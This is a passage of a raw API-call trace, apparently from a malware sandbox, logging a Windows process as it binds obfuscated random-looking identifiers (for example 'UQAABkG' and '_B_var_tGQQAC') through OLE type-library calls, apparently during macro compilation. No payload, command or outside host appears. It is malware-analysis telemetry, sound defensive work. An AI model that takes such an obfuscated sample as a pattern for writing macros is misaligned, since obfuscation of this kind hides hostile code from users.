lpWideCharStr="UQAABkG") returned 8 [0068.813] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UQAABkG", lHashVal=0x10d1d0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.813] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.813] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60e66 | out: _Dst=0x67c2d40) returned 0x0 [0068.813] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_UQAABkG") returned 0x10d554 [0068.813] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_UQAABkG" | out: _Dst="_B_var_UQAABkG") returned 0x0 [0068.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_UQAABkG") returned 15 [0068.813] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.813] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_UQAABkG", lHashVal=0x10d554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.814] IUnknown:Release (This=0x665ba50) returned 0xd [0068.814] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.814] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_UQAABkG", lHashVal=0x10d554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.814] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.814] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.814] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_UQAABkG", lHashVal=0x10d554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.814] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.814] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.814] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_UQAABkG", lHashVal=0x10d554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.814] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.814] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.814] IUnknown:Release (This=0x665ba50) returned 0xd [0068.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc27da, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_UQAABkG") returned 15 [0068.814] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UQAABkG", lHashVal=0x10d554, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0068.814] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60e66 | out: _Dst=0x144ec0) returned 0x0 [0068.815] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tGQQAC", lHashVal=0x102135, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60eb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tGQQAC") returned 7 [0068.815] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tGQQAC", lHashVal=0x102135, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60eb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tGQQAC") returned 7 [0068.815] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tGQQAC", lHashVal=0x102135, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tGQQAC") returned 0x102135 [0068.815] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tGQQAC" | out: _Dst="tGQQAC") returned 0x0 [0068.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tGQQAC") returned 7 [0068.815] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.815] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tGQQAC", lHashVal=0x102135, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.815] IUnknown:Release (This=0x665ba50) returned 0xd [0068.815] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.815] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tGQQAC", lHashVal=0x102135, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.815] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.815] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.815] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tGQQAC", lHashVal=0x102135, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.815] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.815] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.815] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tGQQAC", lHashVal=0x102135, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.815] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60eb6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tGQQAC") returned 7 [0068.815] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tGQQAC", lHashVal=0x102135, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.815] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.815] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60eb6 | out: _Dst=0x67c2d40) returned 0x0 [0068.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tGQQAC") returned 0x109bde [0068.816] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tGQQAC" | out: _Dst="_B_var_tGQQAC") returned 0x0 [0068.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tGQQAC") returned 14 [0068.816] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.816] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tGQQAC", lHashVal=0x109bde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.816] IUnknown:Release (This=0x665ba50) returned 0xd [0068.816] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.816] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tGQQAC", lHashVal=0x109bde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.816] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.816] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.816] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tGQQAC", lHashVal=0x109bde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.816] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.816] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.816] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tGQQAC", lHashVal=0x109bde, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.816] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.816] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.816] IUnknown:Release (This=0x665ba50) returned 0xd [0068.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc280a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tGQQAC") returned 14 [0068.816] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tGQQAC", lHashVal=0x109bde, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.816] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60eb6 | out: _Dst=0x144ec0) returned 0x0 [0068.816] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cAAUox", lHashVal=0x10f0ee, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cAAUox") returned 7 [0068.816] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cAAUox", lHashVal=0x10f0ee, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cAAUox") returned 7 [0068.816] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cAAUox", lHashVal=0x10f0ee, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAAUox") returned 0x10f0ee [0068.816] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cAAUox" | out: _Dst="cAAUox") returned 0x0 [0068.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cAAUox") returned 7 [0068.817] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.817] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cAAUox", lHashVal=0x10f0ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.817] IUnknown:Release (This=0x665ba50) returned 0xd [0068.817] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.817] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cAAUox", lHashVal=0x10f0ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.817] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.817] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.817] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cAAUox", lHashVal=0x10f0ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.817] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.817] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.817] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cAAUox", lHashVal=0x10f0ee, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.817] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60e8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cAAUox") returned 7 [0068.817] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cAAUox", lHashVal=0x10f0ee, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.817] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.817] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60e8e | out: _Dst=0x67c2d40) returned 0x0 [0068.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cAAUox") returned 0x106b58 [0068.817] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cAAUox" | out: _Dst="_B_var_cAAUox") returned 0x0 [0068.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cAAUox") returned 14 [0068.817] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.817] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cAAUox", lHashVal=0x106b58, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.817] IUnknown:Release (This=0x665ba50) returned 0xd [0068.817] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.817] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cAAUox", lHashVal=0x106b58, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.817] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.817] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.817] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cAAUox", lHashVal=0x106b58, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.817] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.817] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.817] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cAAUox", lHashVal=0x106b58, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.817] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.817] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.817] IUnknown:Release (This=0x665ba50) returned 0xd [0068.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc283a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cAAUox") returned 14 [0068.817] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cAAUox", lHashVal=0x106b58, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x6f005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x6f005500000000, pDummy=0x0) returned 0x0 [0068.818] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60e8e | out: _Dst=0x144ec0) returned 0x0 [0068.818] IMalloc:Realloc (This=0x7fefec05380, pv=0x646fd70, cb=0x60) returned 0x69503b0 [0068.818] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ac0000 [0068.818] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f0a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAADwc") returned 7 [0068.818] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAADwc", lHashVal=0x102f41, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f0a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAADwc") returned 7 [0068.819] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAADwc", lHashVal=0x102f41, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f0a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAADwc") returned 7 [0068.819] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAADwc", lHashVal=0x102f41, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.819] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAADwc") returned 0x102f41 [0068.819] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YAADwc" | out: _Dst="YAADwc") returned 0x0 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YAADwc") returned 7 [0068.819] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.819] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAADwc", lHashVal=0x102f41, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.819] IUnknown:Release (This=0x665ba50) returned 0xd [0068.819] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.819] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAADwc", lHashVal=0x102f41, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.819] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.819] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.819] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAADwc", lHashVal=0x102f41, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.819] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.819] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.819] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAADwc", lHashVal=0x102f41, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.819] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f0a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAADwc") returned 7 [0068.819] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAADwc", lHashVal=0x102f41, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.819] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.819] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60f0a | out: _Dst=0x67c2d40) returned 0x0 [0068.819] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAADwc") returned 0x10a9ea [0068.819] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YAADwc" | out: _Dst="_B_var_YAADwc") returned 0x0 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YAADwc") returned 14 [0068.819] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.819] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAADwc", lHashVal=0x10a9ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.819] IUnknown:Release (This=0x665ba50) returned 0xd [0068.819] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.820] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAADwc", lHashVal=0x10a9ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.820] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.820] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.820] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAADwc", lHashVal=0x10a9ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.820] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.820] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.820] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAADwc", lHashVal=0x10a9ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.820] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.820] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.820] IUnknown:Release (This=0x665ba50) returned 0xd [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc286a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_YAADwc") returned 14 [0068.820] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAADwc", lHashVal=0x10a9ea, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0) returned 0x0 [0068.820] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60f0a | out: _Dst=0x144ec0) returned 0x0 [0068.820] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FBwXA4B", lHashVal=0x1099c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBwXA4B") returned 8 [0068.820] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FBwXA4B", lHashVal=0x1099c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60f32, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBwXA4B") returned 8 [0068.820] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FBwXA4B", lHashVal=0x1099c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.820] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FBwXA4B") returned 